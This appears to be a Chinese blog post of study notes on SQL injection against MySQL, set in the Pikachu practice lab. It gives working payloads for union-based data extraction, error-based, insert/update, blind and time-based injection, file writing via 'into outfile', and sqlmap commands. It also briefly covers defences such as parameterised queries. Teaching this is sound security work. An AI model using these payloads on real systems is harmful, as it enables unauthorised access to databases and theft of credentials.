SQL注入(一)

最新推荐文章于 2023-05-05 11:46:55 发布
最新推荐文章于 2023-05-05 11:46:55 发布
阅读量181 收藏
点赞数 1
分类专栏: 网络安全 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45766049/article/details/111603946
版权

文章目录

1 漏洞概述

在owasp发布的top 10中,注入漏洞一直都是危害排名第一

2 攻击流程

  1. 注入点探测

    • 自动方式:使用web漏洞扫描工具
    • 手动方式:手工构造sql注入语句

  2. 信息获取

    通过注入点获取期望得到的数据

    • 环境信息:数据库类型,数据库版本,操作系统版本,用户信息
    • 数据库信息:数据库名称,数据库表,表字段,字段内容

  3. 获取权限

    获取操作系统权限:通过数据库执行shell上传木马

核心思想:通过猜测,构造语句闭合

3 常见注入点类型

数字型:id = $id

字符型:id = ‘$id’

搜索型:text LIKE ‘%{$_GET[‘search’]}%’

4 手动测试

4.1 union联合查询

select username,password from user where id =1 union select 字段1,字段2 from 表名

联合查询字段数需要和主查询一致,查询的结果显示在同一张表上

4.2 order by排序

order by X可以用来推出表中有多少字段

5 小知识补充

在mysql中,自带的information_schema这个表里面存放了大量的重要信息。

例如:

SCHEMATA表:提供了当前mysql实例中所有数据库的信息,。是show databases的结果。

TABLES表:提供了关于数据库中表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果。

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息,是show columns from schemaname.tablename的结果。

获取表名:

select id,email from member where username = ‘kobe’ union select table_schema,table_name from information_schema.tables where table_schema=‘pikachu’;

获取字段名:

select id,email from member where username =‘kobe’ union select table_name,column_name from information_schema.columns where table_name=‘users’;

获取内容:

select id,email from member where username=‘kobe’ union select username,password from users;

6 基于函数报错的信息获取

常用的报错函数updatexml()、extrctvalue()、floor()

前提条件:

后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端。

技巧思路:

在MYSQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。

  • updataxml():是MYSQL对XML文档数据进行查询和修改 的XPATH函数
  • extractvalue():同上
  • floor():MYSQL中用来取整的函数。

6.1 updatexml

作用:改变(查找并替换)XML文档中符合条件的节点的值。

语法:updatexml( xml_document, XPathstring, new_value)

参数一:fiedname是String格式,为表中的字段名。

参数二:XPathstring(xpath格式的字符串)

参数三:new_value , String格式,替换查找到的符合条件的

xpath定位必须是有校的,否则会发生错误

payload:

1‘ and updatexml(1,version(),0)# 这只会显示一部分内容,改进如下:

1’ and updatexml(1,concat(0x7e,version()),0)#

报错只能一次显示一行,多行的话使用limit,0x7e为~的十六进制形式

6.2 extractvalue

作用:从目标XML中返回包含所查询值得字符串

语法:extractvalue(xml_document,xpath_string)

6.3 floor

select 2 from (
    select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x
			)a

floor、count、group by三个要一起用

7 基于insert/update注入

一般insert语句:insert into member(username,password,email) values(‘admin’,‘123456’,‘111@qq.com’);

用or作为闭合s

绕过原理:xiaoming’ or XXXXX or ‘’,‘123456’,‘111@qq.com’

构造payload:xiaoming’ or updatexml(1,concat(0x7e,database()),0) or ’

insert和update原理一样

8 盲注

在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错

此时无法在根据报错信息来进行注入的判断,这种情况下的注入,成为盲注

根据表现形式的不同,盲注又被分为based boolean和based time两种类型

8.1 基于boolean的盲注

  1. 不管是正确的输入还是错误的输入,都只显示两种情况(可认为是0或1)
  2. 在正确的输入下,输入and 1=1 或 and 1=2发现可以判断

使用and而不是or,使用or会一直是0或1,and后为真则1,假则0

’ and ascii(substr(database(),1,1)) >10 #

8.2 基于time的盲注

基于boolean的盲注在页面还可以看到0/1,而基于time的则啥都看不到。

但可以通过特定的输入,判断后台执行的时间,从而确定注入

如,

kobe

kobe’ and sleep(5)#

比较这两句的时间

9 通过SQL漏洞写入恶意代码

前提条件:

  1. 需要知道远程目录
  2. 需要远程目录有写权限
  3. 需要数据库开启了secure_file_priv,默认是关闭的

select 1,2 into outfile “/var/www/html/1.txt”

into outfile将select的结果写入到指定目录的1.txt中

在一些没有回显的注入中可以使用into outfile将结果写入到指定文件,然后访问获取

10 暴力猜测

aa作为字典

kobe’ and exists(select * from aa) #

11 防范

代码层面:

  1. 对输入进行严格的转义和过滤(不是最好的方法)
  2. 使用PDO预处理和参数化(推荐)

网路层面

  1. 通过WAF设备启用防SQL注入策略
  2. 云端防护(360网站卫士,阿里云盾等)

12 sqlmap经典用法

第一步:

-u “xxx” – cookie=“yyy” //带上cookie对URL进行注入探测

第二步:

-u “xxx” --cookie=“yyy” -current-db //对数据库名进行获取

第三步:

u “xxx” --cookie=“yyy” -D pikachu --tables //对数据库的表名进行枚举

第四步:

-u “xxx” --cookie=“yyy” -D pikachu -T users --columns //对库里面的名为users表的列名进行枚举

想当探险家的提莫
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
数据库(一)
TLone
09-10 516
通过上一节的内容我们已经成功的将我们填写的数据发送出去了,也已经成功的接收了,然后就需要判断用户名和密码是否对应了。如果要判断是否对应,就要先知道用户名和密码的信息,通常,这种信息我们会放到一个叫数据库的地方。数据库,从感觉上来看和excel类似,也是用行来储存一个个体的信息,用一个列来储存相同类别的信息。以用户名和密码为例   效果如下 excel 数据库中查询结果 如下
SQL注入
weixin_47193338的博客
03-21 1748
一、介绍、原理 SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。 SQL注入漏洞的产生需要满足以下两个条件: 1、参数用户可控:前端传给后端的参数内容是用户可以控制的。 2、参数带入数据库查询:传入的参数拼接到SQL语句,并且带入数据库查询。 二、MySQL查询语句 1、在不知道任何条件时: Select(要查询的字段名)from(库名.表名) 2、在知道一条已
CTFshow-WEB入门-SQL注入(中)
feng的博客
02-08 1817
web199 很懵。。。把括号给过滤了,所以varchar(255)就不能用了,考虑改成其他的类型,但是不知道到底哪里出了问题,每次一改不是没效果,就是查不出来东西。一旦alter出错就要重新启容器,很烦。 看了一下y4师傅的姿势,服了 1;show tables; ctfshow_user 对,最简单的方法,一直都没想起来,我太菜了。。。 web200 同上 web201 开始学习sqlmap的使用。 sqlmap的使用手册:sqlmap 不过因为是纯英文,英文太菜的我肯定看不太懂,不过也不需要多深入的
MySQL数据库基本操作
RMC131的博客
10-22 259
mysql数据库基本操作
个人学习-SQL 记录(2)
ashen的博客
11-07 198
''' print_r(mysql_error()); 若存在即可使用报错注入, 11-16 利用盲注 得到信息 11. admin'# sui bian SELECT username, password FROM users WHERE username='admin'#' and password='dasdas' LIMIT 0,1 12. admin") # sui bian S...
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
sql注入讲解ppt.pptx
08-10
一、SQL 注入的特点: 1. 广泛性:SQL 注入可以发生在各种 web 应用程序中,无论是使用哪种编程语言或数据库管理系统。 2. 隐蔽性:SQL 注入攻击往往是隐蔽的,很难被发现,需要具备专业的安全知识和经验来检测和...
pangolinsdl—sql注入工具
06-20
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和防御。PangolinsDL就是这样一个工具,它...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL语句的使用
筱竹的博客
03-09 1496
SELECT 列名称 FROM 表名称 – * 代表所有列,通过 * 把users表中所有数据查询出来 SELECT * FROM users – 从 users表中只查询 username这一列数据 – select username from users – users表中只查询 usernamepassword 这二列数据 – select username,password from users – 从users表中查询所有status等于0的用户数据 – select * from u
Metasploit技术
Teemos的博客
09-17 1647
1 metasploit介绍 metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模块化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 metasploit可向后端模块提供多种用来控制测试的接口(如控制台、web、CLI)。通过控制台接口,还可以访问和使用所有metasploit的插件,例如payload、利用模块、post模块等。此外,metasploit还有第三方程序的接口,如nmap和sqlmap
web安全之暴力破解(一)
Teemos的博客
12-24 1241
文章目录1 暴力破解原理和测试流程1.1 测试流程1.2 字典优化技巧2 基于表单的暴力破解3 验证码绕过-on client相关问题3.1 认证流程3.2 常见问题4 验证码绕过服务端5 防暴力破解的措施总结 1 暴力破解原理和测试流程 连续性变化+字典+自动化 一个有效的字典,可以大大提高暴力破解的效率。 常用的账号密码(弱口令) 互联网上被脱裤后账号密码(社工库) 使用指定的字符使用工具按照指定的规则进行排列组合算法生成的密码 1.1 测试流程 1.确认登录接口的脆弱性 确认目标是否存
SSTI模版注入
Teemos的博客
06-02 1233
SSTI模版注入 文章目录SSTI模版注入1 SSTI服务器端模板注入2 模板引擎3 举例3.1 以python的flask为例4 绕过tips4.1 过滤[]等括号4.2 过滤了subclasses4.3 过滤class5 总结 1 SSTI服务器端模板注入 SSTI服务器端模板注入(Server-Side Template Injection),同SQL注入、XSS注入等,都是从用户获取一个输入,由于代码不规范或信任了用户输入,后端的渲染处理上进行了语句的拼接,而导致了服务端模板注入。 SSTI利用的是
渗透之信息收集
Teemos的博客
02-25 554
在信息收集中,最主要的就是收集服务器的配置信息和网站的敏感信息,其中包括域名及子域名信息、目标网站系统、CMS指纹、目标网站真实IP、开放的端口等。 只要与目标网站有关,都应尽量收集。 文章目录1 收集域名信息1.1 Whois查询1.2 备案信息查询2 收集敏感信息3 收集子域名信息3.1 子域名检测工具3.2 搜索引擎枚举3.3 在线查询4 收集常用端口信息4.1 文件共享服务端口4.2 远程连接服务4.3 Web应用服务端口4.4 数据库服务端口4.5 邮件服务端口4.6 网络常见协议端口4.7 特殊
[总结]XSS基础
Teemos的博客
12-27 516
[总结]XSS基础 文章目录[总结]XSS基础1 XSS分类1.1 反射型XSS1.2 存储型XSS1.3 DOM型XSS2 XSS危害2.1 cookie介绍2.2 盗取用户信息2.3 篡改网页链接3 XSS存在位置3.1 探测XSS3.2 可能存在的位置4 绕过简单保护机制4.1 相关编码介绍4.1.1 URL编码4.1.2 html编码4.1.3 JavaScript编码4.2 双写绕过4.3 编码绕过4.4 js伪协议绕过4.5 CSS特性绕过4.6 HTML5特性绕过4.7 其他姿势5 防范措施5
[护网杯 2018]easy_tornado1 write up
Teemos的博客
05-31 415
[护网杯 2018]easy_tornado1 write up 本题所需知识点:SSTI、文件包含 1 题解 点开题目,发现有3个链接 分别点开三个链接 file?filename=/flag.txt&filehash=5cb650c67b3f3eb1c3382db985cba60d file?/filename=/welcome.txt&filehash=453823f83be22fbffa0f5ba9f7e7e8ba file?filename=/hints.txt&fi
sql注入sql注入
最新发布
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值